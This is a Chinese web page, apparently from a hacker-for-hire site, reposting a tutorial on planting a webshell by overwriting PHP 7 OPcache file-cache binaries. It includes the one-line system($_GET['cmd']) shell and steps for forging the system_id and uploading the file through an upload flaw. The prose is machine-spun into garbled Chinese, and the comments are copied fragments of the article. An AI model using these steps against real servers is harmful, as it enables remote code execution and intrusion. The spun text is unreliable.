当前位置:首页 > 网络安全 > 正文内容

使用PHP 7中的OPcache来完成Webshell

访客4年前 (2021-04-15)网络安全1144

在本文中咱们将剖析通过运用PHP7默许的 OPcache引擎来对缝隙进行运用的技巧。通过这个缝隙运用技巧,咱们将能绕过“制止web目录的文件读写”(http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html)的防护,还能在主机中履行恣意代码。
OPcache
OPcache是PHP 7.0内建的新式缓存引擎,它会编译php的脚本,然后在内存中生成对应的字节码。

 
它还支撑在文件体系中进行缓存,咱们能够在PHP.ini中指定缓存目录
opcache.file_cache=/tmp/opcache
在上面指定的目录中,OPcache会将编译好的PHP脚本和对应的PHP脚本放在同一个目录结构之中。比方说,/var/www/index.php所编译的脚本会被保存为/tmp/opcache/[system_id]/var/www/index.php.bin。
这儿的system_id是一个包括了当时PHP版别信息,Zend结构的扩展ID和各种数据类型信息的哈希值。在Ubuntu最新版16.04中,system_id是由当时Zend结构和PHP的版别号所组成的(81d80d78c6ef96b89afaadc7ffc5d7ea),这些哈希值有可能是被用来保证二进制兼容性的,这个目录会在OPcache第一次进行缓存时生成。
咱们将会在下面看到的是每一个OPcache文件还会在文件的header域中保存system_id的对应的副本。
关于OPcache文件夹最有意思的点就在于,用户发动该服务后就会具有OPcache生成的一切文件夹/文件(在/tmp/opcache/目录之下)的写入权限。
下面是OPcache文件夹的权限状况

 
你能够看到OPcache生成的文件夹对用户www-data是可写的,这就导致了咱们能够通过重写目录中的缓存文件为webshell,然后履行恣意代码。
进犯场景
首要,咱们有必要取得缓存文件夹的地址(/tmp/opcache/[system_id]),以及方针PHP文件的地址(/var/www/…)。
为了简略起见,咱们假定网站存在一个phpinfo()文件,咱们能够从这个文件中获取到缓存文件夹和文件源代码的存储地址,还有在核算system_id的时分将会用到的数据(咱们现已开宣布一款能够通过phpinfo()文件来核算system_id的东西。你能够在这儿下载(https://github.com/GoSecure/php7-opcache-override))。
这儿还要再提的一点是方针网站不能对文件上传进行约束。
咱们假定php.ini中装备的额定数据为:
opcache.validate_timestamp = 0    ; PHP 7's default is 1
opcache.file_cache_only = 1       ; PHP 7's default is 0
opcache.file_cache = /tmp/opcache
接下来,咱们来剖析一下进犯的进程:
如下图,咱们现已在网站中找到了一个恣意上传缝隙,而且/var/www/可写,咱们的方针便是将后门代码替换到/tmp/opcache/[system_id]/var/www/index.php.bin中。

 
1、在本地创立一个包括Webshell的PHP文件,将其命名为”index.php”:
 
   system($_GET['cmd']);
?>
2、装备PHP.ini文件中的opcache.file_cache选项。
3、运用php -S 127.0.0.1:8080指令在本地发动一个Web服务器,通过运用指令wget 127.0.0.1:8080向服务器恳求index.php文件来触发缓存引擎。
4、定位到咱们在第一步中设置的缓存文件夹,你就会发现一个名为index.php.bin的文件,这个文件便是通过编译处理后的webshell,如下图。

 
5、由于本地system_id很可能与方针主机的system_id不同,所以咱们有必要翻开index.php.bin文件,并将咱们的system_id修改成方针主机的system_id。正如之前所提到的,system_id能够被猜解,例如暴力破解,或许依据phpinfo()文件中的服务器信息核算出来(https://github.com/GoSecure/php7-opcache-override/blob/master/system_id_scraper.py)。咱们能够在文件签名之后替换system_id,如下图。

 
6、运用恣意上传缝隙将文件上传至/tmp/opcache/[system_id]/var/www/index.php.bin
7、改写网站的index.php,网站将会主动履行咱们的webshell。

 
更深化一点
在php.ini中至少有两个装备项能够形成特殊的行为
1、制止file_cache_only
2、答应validate_timestamp
绕过内存缓存(file_cache_only = 0)
假如内存缓存的优先级高于文件缓存,那么重写OPcache文件并不会履行咱们的webshell。在上传完webshell后,假如服务器重启之后,咱们就能够绕过这种约束。由于内存缓存将被清空,OPcache这时会将文件缓存填充到内存中,然后履行了咱们的webshell。
由于上面提到的这种机制的原因,咱们将很有可能在服务器不重启的状况下完成webshell的履行。
在WordPress等网站结构之中,仍是会有一些过期的文件能够被揭露访问到(比方registration-functions.php(https://github.com/WordPress/WordPress/blob/703d5bdc8deb17781e9c6d8f0dd7e2c6b6353885/wp-includes/registration-functions.php))。

[1] [2]  黑客接单网

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/106231.html

分享给朋友:

“使用PHP 7中的OPcache来完成Webshell” 的相关文章

创业板投资风险揭示书,创业板风险揭示书

保荐机构(主承销商):中泰证券股份有限公司 苏州天路光科技股份有限公司(以下简称“天路科技”、“发行人”或“公司”)首次公开发行不超过2579万股普通股(a股)(以下简称“本次发行”)的申请,已经深圳证券交易所(以下简称“深交所”)创业板上市委员会委员审议通过,并经中国证券监督管理委员会(以下...

尚村最新水貂皮毛价格,丹麦貂皮衣大概多少钱

样子单女款大概貂皮在8000,014-3-24河北尚村蓝狐皮价格,不过价格一般比较高的啊,这个就要看品牌的了,多看看,我要打印IE收藏放入公文包我要留言查看留言文章来源:中国皮草网添加,60公分6000左右,水貂皮大衣最新价格有木有,这个主要看质量了,水貂皮草大衣真假看皮面:如果是真毛。 元/张,5...

黄埔燃料油现货价格_今日燃料油市场价格

这句话是指期货比现货价格高100元吗,柴油,1%的权重都没有,通过技术指标和消息面影响来分析的。有的有点差,点88 国际燃料油收盘价涨跌新加坡。244点5 国内燃料油,燃料油,作为成品油的一种,屈居第二位,有的高点有的低一点,2。97#汽油5点38元/价格升,在原油的加工过程中,常关注的消息为OPE...

二手路虎极光 「2015路虎极光二手车报价」

样子车而已论性能都有点给路2015虎家族丢脸了感觉如果选择这车还真不如选择霸道VX顶配69万那款实惠推荐其他车的话途锐很好Q7虽然多了点但是很值得考虑一下的这个价位如果讨论轿车的话上不了A8L和,公里数等。火烧。 二手车价格:41点00万,2013极光款2点0T AT圣诞限量版,车子没有。 2015...

记一次阿里云主机accesskey泄露到图形化工具开发

简介 在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信息。APP中也会泄露这些信息。 !!!下载链接在文末!!! 概述 我们说下阿里API有什么用吧,以下是...

近期东欧地区某黑产团伙钓鱼文档分析

1.摘要? 近期,安恒威胁情报中心猎影实验室监测捕获到一些以博彩为主题的钓鱼文档。诱饵文档使用模糊的表格照片,诱导受害者打开宏代码。样本通过bitsadmin从挂马网站下载后续恶意程序,并通过pastebin[.]pl、rentry[.]co这类网站的文本共享功能实现后续恶意代码的托管。 通过对...

评论列表

痴者寄认
3年前 (2022-05-28)

p.bin中。 1、在本地创立一个包括Webshell的PHP文件,将其命名为”index.php”:    system($_GET['cmd']); ?>2、装备PHP.ini文件中的opcache.file_cache选项。3、运用php

辙弃摘风
3年前 (2022-05-29)

_only = 1       ; PHP 7's default is 0opcache.file_cache = /tmp/opcache接下来,咱们来剖析一下进犯的进

忿咬任谁
3年前 (2022-05-29)

比方说,/var/www/index.php所编译的脚本会被保存为/tmp/opcache/[system_id]/var/www/index.php.bin。这儿的s

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。